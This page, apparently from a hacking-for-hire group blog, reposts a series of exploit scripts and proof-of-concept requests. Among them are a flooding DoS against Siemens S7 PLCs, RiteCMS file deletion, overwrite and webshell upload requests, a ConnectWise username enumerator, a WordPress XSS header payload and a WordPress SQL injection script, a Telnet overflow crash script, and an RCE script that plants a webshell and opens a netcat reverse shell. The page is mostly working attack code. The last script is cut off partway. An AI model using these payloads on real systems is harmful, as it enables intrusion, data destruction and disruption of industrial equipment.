Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863128727

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Date: 21/10/2021
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs


#!/usr/bin/python3

from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re

# Banner

print(Fore.RED + r"""

 ▄▄▄· ▄• ▄▌▄▄▄▄▄      • ▌ ▄ ·.  ▄▄▄· ▄▄▄▄▄      ▄▄▄   
▐█ ▀█ ███▌•██       ·██ ▐███▐█ ▀█ •██       ▀▄ █· 
▄█▀▀█ █▌▐█▌ ▐█. ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█  ▐█. ▄█▀▄ ▐▀▀▄  
▐█ ▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ 
 ▀  ▀  ▀▀▀  ▀▀▀  ▀█▄▀▀▀  █▀▀▀ ▀  ▀  ▀▀▀  ▀█▄▀.▀  ▀ 
▄▄▄▄▄▄▄▄ .▄▄▄  • ▌ ▄ ·.    ▐ ▄  ▄▄▄· ▄▄▄▄▄      ▄▄▄  
•██  ▀▄.▀·▀▄ █··██ ▐█████ •█▌▐█▐█ ▀█ •██       ▀▄ █·
 ▐█.▐▀▀▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█  ▐█. ▄█▀▄ ▐▀▀▄ 
 ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
 ▀▀▀  ▀▀▀ .▀  ▀▀▀  █▀▀▀▀▀▀▀▀ █ ▀  ▀  ▀▀▀  ▀█▄▀.▀  ▀
                """)

time.sleep(1.5)

# Get IP to exploit

IP = input("Enter the IP address of the device to exploit: ")

# Find the mac address of the device

Mac = getmacbyip(IP)

# Function to send the ouput to "nothing"

def NULL ():

    f = open(os.devnull, 'w')
    sys.stdout = f

# Eternal loop to produce DoS condition

def Arnold ():

    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()
def Sarah ():

    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()
def Kyle ():
    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()

# Arnold
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
NULL()

# Sarah

SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()

# Kyle

KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()
HireHackking 
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd


################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.


#####################################################
# PoC to delete secretConfig.conf file in web root  #
#####################################################


Steps to Reproduce:

1. Login as admin
2. Go to File Manager
3. Delete any file
4. Intercept the request and replace current file name to any files on the server via parameter "delete".

# Assumed there is a secretConfig.conf file in web root

PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf"

Request:
========

GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
HireHackking 
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b


################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root.


############################################################
# PoC to overwrite existing index.php to display phpinfo() #
############################################################


Steps to Reproduce:

1. Login as admin
2. Go to File Manager
3. Then, click Upload file > Browse.. 
4. Upload any file and click checkbox name "overwrite file with same name"
4. Intercept the request and replace current file name to any files path on the server via parameter "file_name".


PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php"
	 param filename - with the content of "<?php phpinfo(); ?>"

Request:
========

POST /ritecmsv3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298
Content-Length: 1840
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="mode"

filemanager
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file"; filename="anyfile.txt"
Content-Type: application/octet-stream

content of the file to overwrite here
-- this is example to overwrite index.php to display phpinfo --
<?php phpinfo(); ?>
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="directory"

media
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file_name"

../index.php
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="overwrite_file"

true
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_mode"

1
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize_xy"

x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize"

640
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="compression"

80
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize_xy"

x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize"

150
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_compression"

70
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_file_submit"

OK - Upload file
-----------------------------351719865731412638493510448298--
HireHackking 
# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration
# Date: 17/12/2021
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://www.connectwise.com/
# Version: vulnerable <= 19.2.24707
# CVE : CVE-2019-16516

# https://github.com/czz/ScreenConnect-UserEnum

from multiprocessing import Process, Queue
from statistics import mean
from urllib3 import exceptions as urlexcept
import argparse
import math
import re
import requests

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


headers = []

def header_function(header_line):
    headers.append(header_line)


def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy):
    try:
        # Payload to dictionary
        payload_dict = {}
        for load in payload:
            split_load = load.split(":")
            if split_load[1] != '{USER}':
                payload_dict[split_load[0]] = split_load[1]
            else:
                payload_dict[split_load[0]] = '{USER}'

        # Enumeration
        total = len(wordlist)
        for counter, user in enumerate(wordlist):
            user_payload = dict(payload_dict)
            for key, value in user_payload.items():
                if value == '{USER}':
                    user_payload[key] = user

            dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1]
            headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}

            req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies)

            x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items())

            if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')):
                queue.put((proc_id, "FOUND", user))
                found_queue.put((proc_id, "FOUND", user))
                if stop: break
            elif verbose:
                queue.put((proc_id, "TRIED", user))
            queue.put(("PERCENT", proc_id, (counter/total)*100))

    except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError):
        print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id))


if __name__ == "__main__":
    # Arguments
    parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool")
    parser.add_argument("url", help="http://example.com/Login")
    parser.add_argument("wordlist", help="username wordlist")
    parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems")
    parser.add_argument("-v", action="store_true", help="verbose mode")
    parser.add_argument("-s", action="store_true", help="stop on first user found")
    parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050")
    args = parser.parse_args()

    # Arguments to simple variables
    wordlist = args.wordlist
    url = args.url
    payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:']
    verbose = args.v
    thread_count = args.c
    failstr = "PasswordInvalid"
    stop = args.s
    proxy= args.p

    print(bcolors.HEADER + """
      __   ___  __     ___
|  | |__  |__  |__)   |__  |\ | |  | |\/|
|__| ___| |___ |  \   |___ | \| |__| |  |

ScreenConnect POC by czz78 :)

    """+ bcolors.ENDC);
    print("URL: "+url)
    print("Payload: "+str(payload))
    print("Fail string: "+failstr)
    print("Wordlist: "+wordlist)
    if verbose: print("Verbose mode")
    if stop: print("Will stop on first user found")

    proxies = {'http': '', 'https': ''}
    if proxy:
        proxies = {'http': proxy, 'https': proxy}

    print("Initializing processes...")
    # Distribute wordlist to processes
    wlfile = open(wordlist, "r", encoding="ISO-8859-1")  # or utf-8
    tothread = 0
    wllist = [[] for i in range(thread_count)]
    for user in wlfile:
        wllist[tothread-1].append(user.strip())
        if (tothread < thread_count-1):
            tothread+=1
        else:
            tothread = 0

    # Start processes
    tries_q = Queue()
    found_q = Queue()
    processes = []
    percentage = []
    last_percentage = 0
    for i in range(thread_count):
        p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy))
        processes.append(p)
        percentage.append(0)
        p.start()

    print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC)
    # Main process loop
    initial_count = len(processes)
    while True:
        # Read the process output queue
        try:
            oldest = tries_q.get(False)
            if oldest[0] == 'PERCENT':
                percentage[oldest[1]] = oldest[2]
            elif oldest[1] == 'FOUND':
                print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
            elif verbose:
                print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
        except: pass

        # Calculate completion percentage and print if /10
        total_percentage = math.ceil(mean(percentage))
        if total_percentage % 10 == 0 and total_percentage != last_percentage:
            print("{}% complete".format(total_percentage))
            last_percentage = total_percentage

        # Pop dead processes
        for k, p in enumerate(processes):
            if p.is_alive() == False:
                processes.pop(k)

        # Terminate all processes if -s flag is present
        if len(processes) < initial_count and stop:
            for p in processes:
                p.terminate()

        # Print results and terminate self if finished
        if len(processes) == 0:
            print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC)
            while True:
                try:
                    entry = found_q.get(False)
                    print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC)
                except:
                    break
            quit()
HireHackking 
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) 
# Date: 22/12/2021
# Exploit Author: gx1  <gaetano.perrone[at]secsi.io>
# Vulnerability Discovery: Gaetano Perrone
# Vendor Homepage: https://www.crmperks.com/
# Software Link: https://wordpress.org/plugins/contact-form-entries/
# Version: < 1.1.7
# Tested on: any

# References: 

* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/

# Description: 
Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting

# Technical Details and Exploitation: 

CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field. 
When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user: 
===============================================================================================================
public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database. 


# Proof Of Concept: 

Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>

------WebKitFormBoundaryCuNGXLnhRsdglEAx

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP']  , ip is injected and saved inside the database. 
When the administrator clicks on the entry element in the plugin, the XSS is triggered. 


# Solution: 
Upgrade Contact Form Entries to version 1.1.7
HireHackking 
# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Google Dork: intext:"Powered by RiteCMS"
# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597


"""
################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default.
# There are 4 ways of bypassing the current file upload protection to achieve remote code execution.

# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved

# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved

# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved
By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability.
Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root

body= Content-Disposition: form-data; name="file_name"
body= ../webrootExec.php

So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php

# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved

$ cat .htaccess

<Files *.php>
deny from all
</Files>

<Files ~ "webshell\.php$">
  Allow from all
</Files>


###################################
# PoC for webshell using Method 2 #
###################################

Steps to Reproduce:

1. Login as admin
2. Go to Files Manager 
3. Choose a directory to upload .php file either media or files directory. 
4. Then, click Upload file > Browse.. 
3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess
4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory

Request:
========

POST /ritecms.v3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309
Content-Length: 1744
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1

-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="mode"

filemanager
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file"; filename="webshell.pHp"
Content-Type: application/octet-stream

<?php system($_GET[base64_decode('Y21k')]);?>
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="directory"

media
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file_name"

-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_mode"

1
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize_xy"

x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize"

640
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="compression"

80
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize_xy"

x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize"

150
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_compression"

70
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_file_submit"

OK - Upload file
-----------------------------410923806710384479662671954309--


####################
# Webshell access: #
####################

# Webshell access via:
PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id

# Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

"""
HireHackking 
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
# Discovered by: Yehia Elghaly
# Discovered Date: 22/12/2021
# Vendor Homepage: https://www.accu-time.com/
# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/
# Tested Version: 1.0
# Vulnerability Type:  Buffer Overflow (DoS) Remote
# Tested on OS: linux 

# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow

# Steps to reproduce:
# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23
# 2. - Run the Script from remote PC/IP
# 3. - Telnet Crashed

#!/usr/bin/env python3

import socket
import sys
print("#######################################################")
print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow)  #")
print("#   	        --------------------------               #")
print("#               BY  Yehia Elghaly                     #")
print("#######################################################")

if (len(sys.argv)<2):
	print ("Usage: %s <Target Host> ") % sys.argv[0]
	print ("Example: %s 192.168.113.1 ") % sys.argv[0]
	exit(0)

print ("\nSending Evil.......Buffer...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
 s.connect((sys.argv[1], 23))
 buffer = "A"*9400
 s.send(" Crashed Check the connection")
 Print ("Crashed")
except:
 print ("Could not connect to ACCU Time Telnet!")
HireHackking 
# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
# Date 22/12/2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.plugins-market.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip
# Version: <= 4.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24750
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md

'''
Description:
The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action,
available to any authenticated user, which could allow users with a role as low as
subscriber to perform SQL injection attacks
'''

# Banner:
banner = '''
 ___  _  _  ____     ___   ___  ___   __     ___   __  ___  ___   ___  
 / __)( \/ )( ___)___(__ \ / _ \(__ \ /  )___(__ \ /. |(__ )| __) / _ \ 
( (__  \  /  )__)(___)/ _/( (_) )/ _/  )((___)/ _/(_  _)/ / |__ \( (_) )
 \___)  \/  (____)   (____)\___/(____)(__)   (____) (_)(_/  (___/ \___/ 

                            [+] WP Visitor Statistics SQL Injection
                            [@] Developed by Ron Jost (Hacker5preme)

'''
print(banner)

import argparse
import requests
from datetime import datetime

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
my_parser.add_argument('-C', '--COMMAND', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
command = args.COMMAND

print('')
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('')

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# Exploit:
exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
exploit = session.get(exploit_url)
print(exploit.text)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
HireHackking 
# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 23/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
# Software Link: https://github.com/rskoolrash/Online-Admission-System
# Tested on: LAMP Stack (Debian 10)

#!/usr/bin/python
import sys
import re
import argparse
import requests
import time
import subprocess

print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')

path = '/' #change me if the path to the /oas is in the root directory or another subdir

class Exploit:

	def __init__(self, target_ip, target_port, localhost, localport):
		self.target_ip = target_ip
		self.target_port = target_port
		self.localhost = localhost
		self.localport = localport

	def exploitation(self):
		payload = """<?php system($_GET['cmd']); ?>"""
		payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""

		url = 'http://' + target_ip + ':' + target_port + path
		r = requests.Session()

		print('[*] Resolving URL...')
		r1 = r.get(url + 'documents.php')
		time.sleep(3)

		#Upload the payload file
		print('[*] Uploading the webshell payload...')
		files = {
		'fpic': ('cmd.php', payload + '\n', 'application/x-php'),
		'ftndoc': ('', '', 'application/octet-stream'),
		'ftcdoc': ('', '', 'application/octet-stream'),
		'fdmdoc': ('', '', 'application/octet-stream'),
		'ftcdoc': ('', '', 'application/octet-stream'),
		'fdcdoc': ('', '', 'application/octet-stream'),
		'fide': ('', '', 'application/octet-stream'),
		'fsig': ('', '', 'application/octet-stream'),
		}
		data = {'fpicup':'Submit Query'}
		r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
		time.sleep(3)

		print('[*] Setting up netcat listener...')
		listener = subprocess.Popen(["nc", "-nvlp", self.localport])
		time.sleep(3)

		print('[*] Spawning reverse shell...')
		print('[*] Watchout!')
		r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
		time.sleep(3)

		if (r3.status_code == 200):
			print('[*] Got shell!')
			while True:
				listener.wait()
		else:
			print('[-] Something went wrong!')
			listener.terminate()

def get_args():
	parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
	parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
	parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
	parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
	parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
	args = parser.parse_args()
	return args

args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport

exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()
HireHackking 
# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Ubuntu
# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.

import requests
import random
import string
from bs4 import BeautifulSoup

url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))

resp = requests.get(url)
htmlParser = BeautifulSoup(resp.text, 'html.parser')

getMenu = htmlParser.findAll("a", {"class": "nav-link"})
selectPage = ""
for i in getMenu:
    if "movie" in i.text.lower():
        selectPage = i["href"]
        break

selectPage = selectPage.replace("./","")
findSql = url + selectPage
resp = requests.get(findSql)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})

sqlPage = movieList[0]["href"]
sqlPage = sqlPage.replace("./","")

sqlPage = url + sqlPage

print("\nFinding path")

findPath = requests.get(sqlPage + '\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>:  ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
print("injection page: "+sqlPage)

parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
    findPath += find + "/"

print("\nFound Path : " + findPath)

